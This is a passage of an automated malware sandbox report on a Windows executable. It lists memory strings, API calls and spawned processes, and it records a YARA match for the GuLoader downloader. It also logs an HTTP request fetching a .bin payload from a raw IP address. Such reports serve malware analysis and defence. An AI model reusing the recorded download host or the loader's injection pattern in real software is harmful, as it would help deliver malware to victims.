                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpString found in binary or memory: https://helpx.ad
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060771307.000000001E88D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061244305.000000001EAC7000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061518015.000000001F6FA000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060591933.000000001E7CB000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060446492.000000001E707000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060874834.000000001E913000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061425020.000000001F689000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054172659.000000001F7BE000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054244376.000000001F82F000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060925849.000000001E944000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054346219.000000001F8A0000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061081457.000000001EA06000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060771307.000000001E88D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061244305.000000001EAC7000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061518015.000000001F6FA000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060591933.000000001E7CB000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060446492.000000001E707000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060874834.000000001E913000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061425020.000000001F689000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054172659.000000001F7BE000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054244376.000000001F82F000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060925849.000000001E944000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054346219.000000001F8A0000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061081457.000000001EA06000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: o4XzTr73Ut.exeString found in binary or memory: https://www.digicert.com/CPS0
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060968348.000000001E95B000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060771307.000000001E88D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061244305.000000001EAC7000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061518015.000000001F6FA000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060591933.000000001E7CB000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060446492.000000001E707000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060874834.000000001E913000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061425020.000000001F689000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054172659.000000001F7BE000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054244376.000000001F82F000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060925849.000000001E944000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060486327.000000001E71D000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060365448.000000001E663000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060643656.000000001E7E1000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000003.1054346219.000000001F8A0000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061125215.000000001EA1C000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1061081457.000000001EA06000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: global trafficHTTP traffic detected: GET /SoftwareCleanedPhilosf.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.112.83.8Cache-Control: no-cache
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
                        Source: o4XzTr73Ut.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_0040755C
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_00406D85
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_72891BFF
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A90CF
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A7CF3
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028AB13E
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028AA69C
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028AA6B5
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A9627
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A6230
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028AA647
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A9F92
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A7FD0
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A6BD0
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A63E0
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A8F10
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A9F10
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028AA35F
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A1F6C
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A208B
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A9CA0
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A8003
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A685E
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A5078
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A85A9
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028AA1CD
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A05F6
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A991C
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A8517
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A5D23
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028AA146
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A6557
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_000644F8
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_000609C0
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_00062A48
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_00069E50
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_0006E590
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_00064D70
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_000F612F
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_000F6B00
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_000FED60
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_000F7170
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_000F9728
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_000F9808
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_00155C58
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_00157FB8
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_00152FE4
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_00152FE4
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_00152FE4
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A90CF NtWriteVirtualMemory,LoadLibraryA,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A7CF3 NtAllocateVirtualMemory,LoadLibraryA,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028AAC4D NtProtectVirtualMemory,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A6230 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A6BD0 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A63E0 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A8F10 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028AA35F NtWriteVirtualMemory,LoadLibraryA,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A8003 NtWriteVirtualMemory,LoadLibraryA,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess Stats: CPU usage > 98%
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1061972250.0000000020640000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameSwills.exe4 vs o4XzTr73Ut.exe
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1061316952.000000001F5F7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSwills.exe4 vs o4XzTr73Ut.exe
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs o4XzTr73Ut.exe
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs o4XzTr73Ut.exe
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmpBinary or memory string: k,\\StringFileInfo\\040904B0\\OriginalFilename vs o4XzTr73Ut.exe
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs o4XzTr73Ut.exe
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060812505.000000001E8A3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs o4XzTr73Ut.exe
                        Source: o4XzTr73Ut.exe, 0000000C.00000003.1004258087.000000000089A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSwills.exe4 vs o4XzTr73Ut.exe
                        Source: o4XzTr73Ut.exe, 0000000C.00000003.1004258087.000000000089A000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs o4XzTr73Ut.exe
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060215267.000000001E3E0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameSwills.exe4 vs o4XzTr73Ut.exe
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060215267.000000001E3E0000.00000004.00020000.sdmpBinary or memory string: OriginalFilename_.dll4 vs o4XzTr73Ut.exe
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060066764.000000001E130000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSwills.exe4 vs o4XzTr73Ut.exe
                        Source: o4XzTr73Ut.exe, 0000000C.00000002.1060066764.000000001E130000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs o4XzTr73Ut.exe
                        Source: o4XzTr73Ut.exeStatic PE information: invalid certificate
                        Source: o4XzTr73Ut.exeVirustotal: Detection: 7%
                        Source: o4XzTr73Ut.exeReversingLabs: Detection: 23%
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeFile read: C:\Users\user\Desktop\o4XzTr73Ut.exeJump to behavior
                        Source: o4XzTr73Ut.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknownProcess created: C:\Users\user\Desktop\o4XzTr73Ut.exe "C:\Users\user\Desktop\o4XzTr73Ut.exe"
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess created: C:\Users\user\Desktop\o4XzTr73Ut.exe "C:\Users\user\Desktop\o4XzTr73Ut.exe"
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess created: C:\Users\user\Desktop\o4XzTr73Ut.exe "C:\Users\user\Desktop\o4XzTr73Ut.exe"
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeFile created: C:\Users\user\AppData\Local\Temp\nsl3A33.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@0/2
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_004021AA CoCreateInstance,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: o4XzTr73Ut.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: _.pdb source: o4XzTr73Ut.exe, 0000000C.00000003.1004258087.000000000089A000.00000004.00000001.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060215267.000000001E3E0000.00000004.00020000.sdmp, o4XzTr73Ut.exe, 0000000C.00000002.1060066764.000000001E130000.00000004.00000001.sdmp

                        Data Obfuscation:

                        barindex
                        Yara detected GuLoaderShow sources
                        Source: Yara matchFile source: 0000000C.00000000.841548004.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.843188696.00000000028A0000.00000040.00000001.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_728930C0 push eax; ret
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A12B9 push ebp; ret
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A8B9A push ecx; retf
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A17BD pushad ; ret
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A1305 push ebp; ret
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A5374 push edx; ret
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A0088 push esp; retn 46BCh
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A3CE4 push esi; ret
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A3C06 push esi; ret
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A0859 pushfd ; iretd
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_028A996F push ebp; ret
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_00062A48 push esp; ret
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_00062261 push ecx; ret
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_0006B530 push esp; iretd
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_000FD4D0 push cs; ret
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 12_2_000FF950 push eax; iretd
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeCode function: 0_2_72891BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeFile created: C:\Users\user\AppData\Local\Temp\nsb3A92.tmp\System.dllJump to dropped file
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\o4XzTr73Ut.exeProcess information set: NOOPENFILEERRORBOX
